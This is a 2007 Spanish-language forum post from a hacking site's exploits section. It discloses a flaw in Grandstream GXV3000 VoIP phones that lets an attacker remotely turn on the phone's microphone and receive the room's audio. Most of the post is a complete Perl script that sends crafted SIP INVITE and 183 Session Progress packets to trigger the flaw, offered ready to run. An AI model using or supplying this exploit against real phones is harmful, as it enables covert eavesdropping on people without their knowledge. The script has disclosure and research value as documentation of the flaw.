elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 09:53  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Escuchas en teléfonos Grandstream GXV3000 con protocolo SIP - 0day
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Escuchas en teléfonos Grandstream GXV3000 con protocolo SIP - 0day  (Leído 2,231 veces)
ANELKAOS
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.045


#include<nda.h>


Ver Perfil WWW
Escuchas en teléfonos Grandstream GXV3000 con protocolo SIP - 0day
« en: 29 Agosto 2007, 14:21 »


Los teléfonos de Voz sobre IP afectados son los Grandstream modelo GXV3000 con el último firm disponible (versión 1.0.1.7). El 'eavesdropping' o 'pinchazo telefónico' es uno de los fallos de seguridad mas peligrosos en Voz sobre IP ya que nos permite interceptar llamadas, en este caso se trata de dejar a la escucha el teléfono remoto, incluso estándo descolgado, utilizando el servicio de manos libres. Esta vulnerabilidad se da gracias al inseguro protocolo SIP por medio del método 'INVITE'  . La vulnerabilidad consiste en que una vez lanzado el ataque, el teléfono atacado comienza a enviar tráfico RTP con el sonido ambiente que es capaz de capturar el micrófono de este.

Esté ataque se puede realizar también con:
SiVuS 1.09 beta - Escaner de vulnerabilidades para Voz sobre IP
http://foro.elhacker.net/index.php/topic,117438.0.html

Código:
#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);

 

$socket=new IO::Socket::INET->new(

        Proto=>'udp',

                               LocalPort => $ARGV[4],

                               PeerPort=>$ARGV[1],

        PeerAddr=>$ARGV[0]);

 

$sdp= "v=0\r

o=username 0 0 IN IP4 $ARGV[3]\r

s=The Funky Flow\r

c=IN IP4 $ARGV[3]\r

t=0 0\r

m=audio 33404 RTP/AVP 3 97 0 8\r

a=rtpmap:0 PCMU/8000\r

a=rtpmap:3 GSM/8000\r

a=rtpmap:8 PCMA/8000\r

a=rtpmap:97 iLBC/8000\r

a=fmtp:97 mode=30\r\n";

$sdplen= length $sdp;

$msg= "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r

Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r

From: <sip:$ARGV[5]\@$ARGV[3]>\r

To:  <sip:$ARGV[2]\@$ARGV[0]>\r

Contact: <sip:$ARGV[5]\@$ARGV[3]>\r

Call-ID: ougui\@$ARGV[3]\r

CSeq: 10419 INVITE\r

Max-Forwards: 70\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

sleep(3);

$msg=

"SIP/2.0 183 Session Progress\r

Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r

From: <sip:$ARGV[5]\@$ARGV[3]>\r

To: <sip:$ARGV[2]\@$ARGV[0]>\r

Call-ID: ougui\@$ARGV[3]\r

CSeq: 10419 INVITE\r

Max-Forwards: 70\r

Contact: <sip:$ARGV[5]\@$ARGV[3]>\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);


Fuente: http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065417.html
Web oficial del producto: http://www.grandstream.com/gxv3000.html
« Última modificación: 29 Agosto 2007, 14:31 por ANELKAOS » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Escuchas msn
Bugs y Exploits
chica_23 1 1,246 Último mensaje 7 Agosto 2011, 20:05
por scr21
Escuchas msn
Chats; IRC y Messengers
chica_23 2 984 Último mensaje 27 Agosto 2011, 06:19
por Last_
803 personas sufrieron las escuchas ilegales practicadas por empleados de...
Noticias
wolfbcn 0 444 Último mensaje 11 Diciembre 2011, 02:30
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines